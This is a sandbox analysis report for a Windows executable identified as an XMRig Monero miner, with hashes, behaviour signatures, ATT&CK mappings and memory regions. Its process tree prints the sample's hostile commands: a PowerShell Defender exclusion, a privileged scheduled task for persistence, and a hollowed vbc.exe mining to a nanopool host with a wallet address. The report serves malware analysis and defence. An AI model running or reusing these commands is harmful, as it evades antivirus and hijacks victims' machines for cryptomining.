Analysis

  • max time kernel
    72s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-03-2023 08:03

General

  • Target

    b6622a436cb33c1ee6a116580b12a39097eb4d566137705060e8bc3d02d2e43e.exe

  • Size

    3.4MB

  • MD5

    529ecbed8bf3ff5e1c4b613f36ab4758

  • SHA1

    f84b7a020c221879744427f34c1957b4a52fc998

  • SHA256

    b6622a436cb33c1ee6a116580b12a39097eb4d566137705060e8bc3d02d2e43e

  • SHA512

    61cf4580182d4bbfe294589eaf1d1b0c9d4fdbc26a18e5b2e0dee1e4284a3e63cad5685fb79588b1cd9032c7cdfc109287276284c631540cd50b1786b05ea400

  • SSDEEP

    98304:OK1xSdXvKNmorEZCXZcVrx5EibycA63ZZQi/hmnbpHWw:xmohXZyTl+d63pmVb

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • .NET Reactor proctector 3 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\b6622a436cb33c1ee6a116580b12a39097eb4d566137705060e8bc3d02d2e43e.exe
    "C:\Users\Admin\AppData\Local\Temp\b6622a436cb33c1ee6a116580b12a39097eb4d566137705060e8bc3d02d2e43e.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4296
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WBGRGV" /tr "C:\ProgramData\portableWin\WBGRGV.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2064
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WBGRGV" /tr "C:\ProgramData\portableWin\WBGRGV.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4524
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1216

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scripting

1
T1064

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Scripting

1
T1064

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ak2cuti5.r1j.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1216-264-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1216-298-0x0000018C96420000-0x0000018C96460000-memory.dmp
    Filesize

    256KB

  • memory/1216-340-0x0000018C96480000-0x0000018C964A0000-memory.dmp
    Filesize

    128KB

  • memory/1216-339-0x0000018C96460000-0x0000018C96480000-memory.dmp
    Filesize

    128KB

  • memory/1216-338-0x0000018C96480000-0x0000018C964A0000-memory.dmp
    Filesize

    128KB

  • memory/1216-337-0x0000018C96460000-0x0000018C96480000-memory.dmp
    Filesize

    128KB

  • memory/1216-332-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/4296-155-0x00000276BF0E0000-0x00000276BF0F0000-memory.dmp
    Filesize

    64KB

  • memory/4296-165-0x00000276A6F90000-0x00000276A6FB2000-memory.dmp
    Filesize

    136KB

  • memory/4940-173-0x00007FFBE55C0000-0x00007FFBE56C0000-memory.dmp
    Filesize

    1024KB

  • memory/4940-182-0x00007FFBCAA70000-0x00007FFBCAB1A000-memory.dmp
    Filesize

    680KB

  • memory/4940-144-0x00007FFBE7840000-0x00007FFBE79E1000-memory.dmp
    Filesize

    1.6MB

  • memory/4940-146-0x00007FFBC9570000-0x00007FFBCA031000-memory.dmp
    Filesize

    10.8MB

  • memory/4940-147-0x00007FFBE73B0000-0x00007FFBE73DB000-memory.dmp
    Filesize

    172KB

  • memory/4940-148-0x0000000000CE0000-0x00000000010D0000-memory.dmp
    Filesize

    3.9MB

  • memory/4940-150-0x00007FFBCA860000-0x00007FFBCA9AE000-memory.dmp
    Filesize

    1.3MB

  • memory/4940-149-0x0000000000CE0000-0x00000000010D0000-memory.dmp
    Filesize

    3.9MB

  • memory/4940-151-0x00007FFBE5A60000-0x00007FFBE5A87000-memory.dmp
    Filesize

    156KB

  • memory/4940-154-0x000000001C390000-0x000000001C3A0000-memory.dmp
    Filesize

    64KB

  • memory/4940-169-0x00007FFBE7A90000-0x00007FFBE7C85000-memory.dmp
    Filesize

    2.0MB

  • memory/4940-170-0x00007FFBE6EF0000-0x00007FFBE6FAE000-memory.dmp
    Filesize

    760KB

  • memory/4940-172-0x00007FFBE5880000-0x00007FFBE591D000-memory.dmp
    Filesize

    628KB

  • memory/4940-171-0x00007FFBE51E0000-0x00007FFBE54A9000-memory.dmp
    Filesize

    2.8MB

  • memory/4940-143-0x0000000000CE0000-0x00000000010D0000-memory.dmp
    Filesize

    3.9MB

  • memory/4940-176-0x00007FFBE69D0000-0x00007FFBE6A7C000-memory.dmp
    Filesize

    688KB

  • memory/4940-178-0x00007FFBE6380000-0x00007FFBE64AA000-memory.dmp
    Filesize

    1.2MB

  • memory/4940-179-0x00007FFBD0510000-0x00007FFBD0575000-memory.dmp
    Filesize

    404KB

  • memory/4940-177-0x00007FFBE6FB0000-0x00007FFBE704E000-memory.dmp
    Filesize

    632KB

  • memory/4940-180-0x00007FFBE7050000-0x00007FFBE73A5000-memory.dmp
    Filesize

    3.3MB

  • memory/4940-181-0x00007FFBE7770000-0x00007FFBE783D000-memory.dmp
    Filesize

    820KB

  • memory/4940-145-0x0000000000A00000-0x0000000000A43000-memory.dmp
    Filesize

    268KB

  • memory/4940-183-0x00007FFBE7560000-0x00007FFBE75B5000-memory.dmp
    Filesize

    340KB

  • memory/4940-185-0x00007FFBD7BB0000-0x00007FFBD7BBA000-memory.dmp
    Filesize

    40KB

  • memory/4940-186-0x00007FFBC9570000-0x00007FFBCA031000-memory.dmp
    Filesize

    10.8MB

  • memory/4940-187-0x00007FFBD8D30000-0x00007FFBD8D46000-memory.dmp
    Filesize

    88KB

  • memory/4940-189-0x00007FFBE6BF0000-0x00007FFBE6D1A000-memory.dmp
    Filesize

    1.2MB

  • memory/4940-188-0x00007FFBCA9B0000-0x00007FFBCAA6D000-memory.dmp
    Filesize

    756KB

  • memory/4940-191-0x00007FFBE5A60000-0x00007FFBE5A87000-memory.dmp
    Filesize

    156KB

  • memory/4940-190-0x00007FFBCA860000-0x00007FFBCA9AE000-memory.dmp
    Filesize

    1.3MB

  • memory/4940-193-0x0000000000A00000-0x0000000000A43000-memory.dmp
    Filesize

    268KB

  • memory/4940-192-0x0000000000CE0000-0x00000000010D0000-memory.dmp
    Filesize

    3.9MB

  • memory/4940-222-0x00007FFBE7A90000-0x00007FFBE7C85000-memory.dmp
    Filesize

    2.0MB

  • memory/4940-224-0x00007FFBE51E0000-0x00007FFBE54A9000-memory.dmp
    Filesize

    2.8MB

  • memory/4940-225-0x00007FFBC3D00000-0x00007FFBC3D35000-memory.dmp
    Filesize

    212KB

  • memory/4940-331-0x0000000000CE0000-0x00000000010D0000-memory.dmp
    Filesize

    3.9MB

  • memory/4940-142-0x00007FFBCA9B0000-0x00007FFBCAA6D000-memory.dmp
    Filesize

    756KB

  • memory/4940-141-0x00007FFBE30D0000-0x00007FFBE30E2000-memory.dmp
    Filesize

    72KB

  • memory/4940-140-0x00007FFBE6FB0000-0x00007FFBE704E000-memory.dmp
    Filesize

    632KB

  • memory/4940-139-0x00007FFBCAA70000-0x00007FFBCAB1A000-memory.dmp
    Filesize

    680KB

  • memory/4940-135-0x0000000000A00000-0x0000000000A43000-memory.dmp
    Filesize

    268KB